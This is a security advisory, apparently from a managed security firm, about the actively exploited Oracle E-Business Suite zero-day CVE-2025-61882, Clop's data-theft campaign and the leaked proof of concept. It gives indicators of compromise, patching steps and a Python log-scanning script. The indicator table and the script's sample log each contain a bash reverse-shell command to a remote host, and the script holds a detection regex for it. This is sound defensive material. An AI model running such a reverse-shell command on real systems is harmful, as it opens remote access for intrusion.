
Patched Oracle zero-day and Clop data theft

Written by Integrity360 | Oct 6, 2025 10:55:04 AM

Oracle has released a new critical Security Alert for a zero-day vulnerability, now tracked as CVE-2025-61882, that is being actively exploited in the wild. The vulnerability affects Oracle E-Business Suite and has been assigned a CVSS 3.1 base score of 9.8 (Critical). It allows an unauthenticated attacker with network access to compromise the system by achieving remote code execution (RCE) on the affected host.

The vulnerability affects the BI Publisher Integration component of the Oracle Concurrent Processing product within Oracle E-Business Suite. The supported versions impacted by this flaw are 12.2.3 through 12.2.14. Given the severity and ease of exploitation (Attack Complexity: Low; Privileges Required: None; User Interaction: None), organisations running these versions face an extreme and imminent risk of compromise.


Threat intelligence feeds confirm that this zero-day vulnerability was exploited by the Clop ransomware gang in data theft attacks that took place in August 2025. Clop leveraged this flaw, alongside others (some of which Oracle patched in its July 2025 updates), to steal large volumes of data from multiple victims' Oracle E-Business Suite systems. The threat actors then ran an extortion campaign, emailing victims with ransom demands to prevent the leaking of the stolen private files and documents.


Clop has a documented history of exploiting zero-day vulnerabilities in large-scale data theft operations, which underscores the seriousness of this campaign. The existence of a public proof-of-concept (PoC) exploit further increases the urgency of mitigation.


While the Clop ransomware group was responsible for the attacks in August 2025, news of the zero-day and the PoC exploit was leaked on Telegram by a separate group known as the "Scattered Lapsus$ Hunters". That group released an archive containing two Python scripts (exp.py and server.py) designed to exploit the vulnerability and either execute arbitrary commands on targeted servers or open a reverse shell back to the attacker's server.


Security teams should use the following IOCs, provided by Oracle, to hunt for malicious activity in their environments.

| Indicator Type | Value | Description |
|---|---|---|
| IP Address | 200[.]107[.]207[.]26 | Potential GET and POST activity |
| IP Address | 185[.]181[.]60[.]11 | Potential GET and POST activity |
| Command | sh -c /bin/bash -i >& /dev/tcp/ / 0>&1 | Establish an outbound TCP connection over a specific port to get a reverse shell |
| SHA256 | 76b6d36e04e367a2334c445b51e1ecce97e4c614e88dfb4f72b104ca0f31235d | oracle_ebs_nday_exploit_poc_scattered_lapsus_retard_cl0p_hunters.zip |
| SHA256 | aa0d3859d6633b62bccfb69017d33a8979a3be1f3f0a5a4bf6960d6c73d41121 | oracle_ebs_nday_exploit_poc_scattered_lapsus_retard-cl0p_hunters/exp.py |
| SHA256 | 6fd538e4a8e3493dda6f9fcdc96e814bdd14f3e2ef8aa46f0143bff34b882c1b | oracle_ebs_nday_exploit_poc_scattered_lapsus_retard-cl0p_hunters/server.py |


What you should do 

The following recommendations are designed to help organisations mitigate their exposure to CVE-2025-61882 and respond effectively to potential compromise. 

  • Apply Emergency Patches Immediately: We strongly recommend that all customers apply the security updates provided in the Security Alert for CVE-2025-61882 as soon as possible. The active exploitation of this vulnerability in the wild makes immediate patching the single most critical defence.

  • Verify Patch Prerequisites: Before applying the emergency patch, organisations must ensure that the October 2023 Critical Patch Update has been installed. This earlier update is a critical dependency, and failure to install it first may result in an unsuccessful application of the security updates for this vulnerability.

  • Initiate Proactive Threat Hunting: Security teams must use the specific Indicators of Compromise (IP addresses, file hashes, and command strings) detailed in the previous section to actively hunt for signs of compromise within their Oracle E-Business Suite environments. This includes reviewing network logs for connections to or from the malicious IPs and searching file systems for the exploit scripts and commands.
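As an added example (not Oracle's or Integrity360's tooling), the following Python sweep applies the IOCs from the table above to web-access log lines, process or audit log command lines, and file digests. The sample log lines, the combined log format and the 203.0.113.10 host in them are constructed assumptions.

```python
"""IOC sweep for the CVE-2025-61882 indicators in this advisory (added example,
not Oracle's or Integrity360's tooling). Sample log lines are constructed."""
import hashlib
import re

# Indicators from the advisory table; IPs are stored re-fanged for matching.
IOC_IPS = {"200.107.207.26", "185.181.60.11"}
IOC_SHA256 = {
    "76b6d36e04e367a2334c445b51e1ecce97e4c614e88dfb4f72b104ca0f31235d":
        "oracle_ebs_nday_exploit_poc_scattered_lapsus_retard_cl0p_hunters.zip",
    "aa0d3859d6633b62bccfb69017d33a8979a3be1f3f0a5a4bf6960d6c73d41121": "exp.py",
    "6fd538e4a8e3493dda6f9fcdc96e814bdd14f3e2ef8aa46f0143bff34b882c1b": "server.py",
}
# Shape of the advisory's command IOC: interactive bash with stdio bound to
# /dev/tcp/<host>/<port>; also matches the redacted form shown in the table.
REVERSE_SHELL_RE = re.compile(r"bash\s+-i\s*>&\s*/dev/tcp/\S*\s*/\S*\s+0>&1")

def refang(value: str) -> str:
    """Turn a de-fanged indicator such as 200[.]107[.]207[.]26 into a plain IP."""
    return value.replace("[.]", ".")

def scan_access_log(lines):
    """Return lines whose client IP (first field, combined log format) is an IOC."""
    return [ln for ln in lines if refang(ln.split(" ", 1)[0]) in IOC_IPS]

def scan_command_log(lines):
    """Return process/audit log lines containing the /dev/tcp reverse-shell pattern."""
    return [ln for ln in lines if REVERSE_SHELL_RE.search(ln)]

def classify_hash(digest: str):
    """Return the advisory file name for a known SHA256 digest, else None."""
    return IOC_SHA256.get(digest.lower())

def classify_file_bytes(data: bytes):
    """Hash file contents and look the digest up against the advisory hashes."""
    return classify_hash(hashlib.sha256(data).hexdigest())

SAMPLE_ACCESS_LOG = [  # constructed; combined log format is an assumption
    '10.0.0.5 - - [12/Aug/2025:09:14:02 +0000] "GET /OA_HTML/AppsLogin HTTP/1.1" 200 5123',
    '200.107.207.26 - - [12/Aug/2025:09:15:44 +0000] "POST /OA_HTML/AppsLogin HTTP/1.1" 200 310',
]
SAMPLE_COMMAND_LOG = [  # constructed; 203.0.113.10 is a documentation-range address
    "uid=1001 cmd=sh -c ls -la /u01/app",
    "uid=1001 cmd=sh -c /bin/bash -i >& /dev/tcp/203.0.113.10/4444 0>&1",
]

if __name__ == "__main__":
    print("access log hits:", scan_access_log(SAMPLE_ACCESS_LOG))
    print("command hits:", scan_command_log(SAMPLE_COMMAND_LOG))
```

For real files, read the bytes from disk and pass them to classify_file_bytes; any match should be treated as evidence of the leaked PoC archive being present and escalated for incident response.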

If you are worried about any of the threats outlined in this bulletin, or need help in determining what steps you should take to protect yourself from the most material threats facing your organisation, please contact your account manager, or alternatively get in touch to find out how you can protect your organisation.